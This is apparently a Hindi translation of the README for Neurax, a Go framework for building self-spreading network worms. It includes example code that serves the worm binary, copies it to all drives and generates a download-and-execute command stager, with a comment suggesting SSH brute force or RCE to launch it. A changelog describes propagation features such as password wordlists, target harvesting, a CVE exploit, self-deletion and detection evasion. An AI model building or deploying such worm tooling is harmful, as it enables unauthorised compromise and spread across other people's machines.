एक ढाँचा जो स्व-प्रसार सॉफ्टवेयर के निर्माण में सहायता करता है
अवलोकन
Neurax की सहायता से, Golang बायनेरिज़ LAN/WAN पर बिना किसी बाहरी सर्वर के फैल सकते हैं।
विविध कॉन्फ़िग विकल्प और कमांड स्टेजर विभिन्न वायरलेस वातावरणों में तेजी से प्रसार की अनुमति देते हैं।
उदाहरण कोड
package main
import . "github.com/redcode-labs/Neurax"
func main(){
//Specify serving port and stager to use
Nrx.Config.Port = 5555
Nrx.Config.Stager = "wget"
//Start a server that exposes the current binary in the background
go NeuraxServer()
//Copy current binary to all logical drives
NeuraxDisks()
//Create a command stager that should be launched on target machine
//It will download, decode and execute the binary
cmd_stager := NeuraxStager()
/* Now you have to somehow execute the command generated above.
You can use SSH bruteforce, some RCE or whatever else you want ;> */
}
v. 2.X में नया (अलग उप-प्रोजेक्ट)
- रिफैक्टर: तैयार-से-उपयोग बाइनरी के पक्ष में फ्रेमवर्क-जैसे दृष्टिकोण को छोड़ दिया
- सभी UNIX लक्ष्यों के लिए सामान्य wget स्टेजर
- वर्म के व्यवहार को तुरंत बदलने के लिए एकल कॉन्फ़िग फ़ाइल
unlinkat(2) के माध्यम से स्वचालित स्व-हटाना
- नेटवर्क फैलाने की क्षमताओं को पूरक करने के लिए उदाहरण LinuxKI CVE शोषण
- JSON कॉन्फ़िग फ़ाइल डाउनलोड और मूल्यांकन की जाती है
- होस्ट हार्वेस्टर का न्यूनतम पुनर्लेखन
v. 2.5 में नया
- दूसरे-चरण बाइनरी का वैकल्पिक पृष्ठभूमि निष्पादन (
N.StagerBg)
- कमांड स्टेजर संदर्भ-स्थानीय पथ में सहेजता और निष्पादित करता है
- यह सफल निष्पादन के तुरंत बाद डाउनलोड की गई बाइनरी को भी हटा देता है
- गति/स्थिरता कारणों से समन्वित कमांड निष्पादन तंत्र हटा दिया गया।
मैं अगले रिलीज़ से पहले एक उचित विकल्प लेकर आऊंगा।
N.NoInfectCheck यह जाँच अक्षम करने के लिए कि होस्ट पहले से संक्रमित है या नहीं।
- लक्ष्य मशीन पर एकल-निष्पादन नीति,
NeuraxServer() के अंदर रखे गए अनन्य फ़ाइल म्यूटेक्स के साथ लागू की गई।
- बाइनरी की सेवा के लिए एक नेस्टेड गोरोटीन जोड़ा गया
- Linux के लिए नया
httrack स्टेजर
- पहचान से बचने के लिए सामान्य वर्डलिस्ट पर टिप्पणी की गई
- कमांड स्टेजर बाइनरी हटाने से पहले प्रतीक्षा कर सकता है (
N.StagerRemovalDelay)
v. 2.0 में नया
- नए वर्डलिस्ट म्यूटेटर + देश के अनुसार सामान्य पासवर्ड
- तात्कालिक निष्क्रिय स्कैनिंग
.FastScan विकल्प जो सक्रिय स्कैन को थोड़ा तेज़ बनाता है
- वर्डलिस्ट सख्ती से मेमोरी में बनाई जाती हैं
NeuraxScan() तर्क के रूप में चैनल के बजाय एक कॉलबैक फ़ंक्शन स्वीकार करता है।
NeuraxScan() अनंत लूप में स्कैन करता है जिसमें पूरे सबनेट/लक्ष्यों के पूल के प्रत्येक स्कैन के बीच अंतराल सेट करने की संभावना होती है
- IP प्रारूप में नहीं होने वाले लक्ष्यों के लिए रिवर्स-DNS लुकअप
- ARP कैश से लक्ष्य उम्मीदवारों का निष्कर्षण
- केवल चयनित लक्ष्यों की सूची स्कैन करने की संभावना + विशिष्ट लक्ष्यों (जैसे डिफ़ॉल्ट गेटवे) को प्राथमिकता देना
- निष्क्रिय नेटवर्क स्कैन का उपयोग करते समय इंटरफ़ेस और टाइमआउट निर्दिष्ट करने की संभावना।
- बेहतर कमांड स्टेजर (वैकल्पिक रूप से ऊंचे विशेषाधिकारों / कई बार निष्पादित किया जा सकता है)
- विकल्पों के नामों में कुछ बदलाव
NeuraxConfig. N. बन गया (क्योंकि टाइप करना छोटा है)
- यादृच्छिक मेमोरी आवंटन + बाइनरी प्रवासन के लिए फ़ंक्शन
- एकाधिक स्टेजर को श्रृंखलित करने की संभावना (उदा.
wget + curl)
- बनाई गई वर्डलिस्ट की मात्रा और जटिलता को आसानी से ट्यून किया जा सकता है (
.WordlistExpand जैसे विकल्पों के साथ)
- बनाई गई बाइनरी का टाइम-टू-लाइव सेट करने की संभावना
कॉन्फ़िग प्रविष्टियों की सूची